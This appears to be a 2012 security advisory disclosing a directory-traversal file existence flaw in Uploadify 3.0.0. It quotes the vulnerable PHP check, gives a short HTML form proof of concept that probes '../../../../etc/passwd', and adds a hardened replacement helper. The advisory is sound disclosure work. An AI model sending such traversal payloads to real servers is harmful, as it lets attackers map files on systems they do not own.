Uploadify 3.0.0 File Existence Disclosure

2012-04-06T00:00:00
ID PACKETSTORM:111627
Type packetstorm
Reporter Janek Vind aka waraxe
Modified 2012-04-06T00:00:00

Description

                                        
[waraxe-2012-SA#082] - File Existence Disclosure in Uploadify 3.0.0  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 05. April 2012  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-82.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Uploadify is a jQuery plugin that integrates a fully-customizable multiple file  
upload utility on your website. It uses a mixture of Javascript, ActionScript,  
and any server-side language to dynamically create an instance over any DOM  
element on a page.  
  
http://www.uploadify.com/  
  
Vulnerable versions  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Affected is Uploadify version 3.0.0.  
  
###############################################################################  
1. File Existence Disclosure vulnerability in "uploadify-check-exists.php"  
###############################################################################  
  
Reason: missing input data validation  
Attack vector: user submitted POST parameter "filename"  
Preconditions: none  
Result: attacker can reveal existence of files and directories on remote system  
  
Source code snippet from script "uploadify-check-exists.php":  
-----------------[ source code start ]---------------------------------  
if (file_exists($_SERVER['DOCUMENT_ROOT'] . '/uploads/' . $_POST['filename'])) {  
echo 1;  
} else {  
echo 0;  
}  
-----------------[ source code end ]-----------------------------------  
  
The user-submitted POST parameter "filename" is concatenated directly into the  
argument of the PHP function "file_exists()". Because there is no input data  
validation, an attacker can use directory traversal to reveal the existence of  
arbitrary files and directories on the affected system.  
  
Test:  
-----------------[ PoC code start ]-----------------------------------  
<html><body><center>  
<form action="http://localhost/uploadify-v3.0.0/uploadify-check-exists.php" method="post">  
<input type="hidden" name="filename" value="../../../../../../../../etc/passwd">  
<input type="submit" value="Test">  
</form>  
</center></body></html>  
-----------------[ PoC code end ]-------------------------------------  
  
Result: 1  
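
Hardened form of the check, as an added example (not part of the original advisory and not Uploadify's own fix). It assumes uploads are stored flat in a single directory; the helper name upload_exists() and the demo file names are hypothetical.

```php
<?php
// Added example, not Uploadify code. upload_exists() is a hypothetical helper.
// Assumption: uploads are stored flat in one directory, with no subfolders.
function upload_exists(string $uploadDir, $name): bool
{
    // Reject arrays (filename[]=x), empty strings and NUL bytes.
    if (!is_string($name) || $name === '' || strpos($name, "\0") !== false) {
        return false;
    }
    // Reject path separators and dot names instead of silently rewriting them.
    if (strpbrk($name, "/\\") !== false || $name === '.' || $name === '..') {
        return false;
    }
    $base = realpath($uploadDir);
    if ($base === false) {
        return false;
    }
    // realpath() resolves symlinks, so a link inside uploads/ that points
    // elsewhere fails the containment test below.
    $real = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($real === false || dirname($real) !== $base) {
        return false;
    }
    return is_file($real); // regular files only, never directories
}

// Endpoint usage (replaces the file_exists() call shown above):
//   $dir = $_SERVER['DOCUMENT_ROOT'] . '/uploads';
//   echo upload_exists($dir, $_POST['filename'] ?? null) ? 1 : 0;

// Offline demo on constructed sample input; runs only from the command line.
if (PHP_SAPI === 'cli') {
    $root = sys_get_temp_dir() . '/uploadify_demo_' . getmypid();
    mkdir($root . '/uploads', 0700, true);
    file_put_contents($root . '/uploads/photo.jpg', 'x');
    file_put_contents($root . '/secret.txt', 'x');
    $samples = ['photo.jpg', '../secret.txt', '../../../../etc/passwd', '.', ['a']];
    foreach ($samples as $in) {
        $hit = upload_exists($root . '/uploads', $in) ? 1 : 0;
        printf("%-28s => %d\n", json_encode($in, JSON_UNESCAPED_SLASHES), $hit);
    }
    unlink($root . '/uploads/photo.jpg');
    unlink($root . '/secret.txt');
    rmdir($root . '/uploads');
    rmdir($root);
}
```

The endpoint still answers for file names inside uploads/ itself, which is its intended function; the check only removes the ability to probe paths outside that directory.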
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
come2waraxe@yahoo.com  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
Random project: http://albumnow.com/  
---------------------------------- [ EOF ] ------------------------------------  